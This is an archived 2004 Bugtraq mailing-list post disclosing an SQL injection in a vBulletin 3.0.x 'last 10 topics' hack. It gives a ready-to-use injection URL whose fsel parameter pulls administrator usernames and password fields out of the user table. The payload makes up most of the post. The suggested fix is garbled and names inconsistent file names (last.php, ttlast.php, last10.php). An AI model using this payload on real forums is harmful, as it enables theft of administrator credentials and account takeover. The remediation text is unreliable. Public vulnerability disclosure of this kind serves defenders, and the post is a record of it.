[37313] in bugtraq

home help back first fref pref prev next nref lref last post

SQL injection in vBulletin forums (last10.php)

daemon@ATHENA.MIT.EDU (Dr. Death)
Thu Nov 11 12:07:15 2004

From: "Dr. Death" <drdeath4ever@hotmail.com>
To: bugtraq@securityfocus.com
Date: Thu, 11 Nov 2004 05:29:44 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <BAY22-F31LDGdyoOxg20005c75b@hotmail.com>

hi all,

a new SQL injection found in VBulletin Forums 3.0.x

the Vulnerabilite found in last.php, last 10 topics hack.


last.php?fsel=,user.password%20as%20title,user.%20 
%20%20%20username%20as%20lastposter%20FROM%20user, 
thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201

to solve the problem delet fsel? from ttlast.php and last10.php

Best Regards,
Dr.Death
THE MAN OF THE DARK SIDE



home help back first fref pref prev next nref lref last post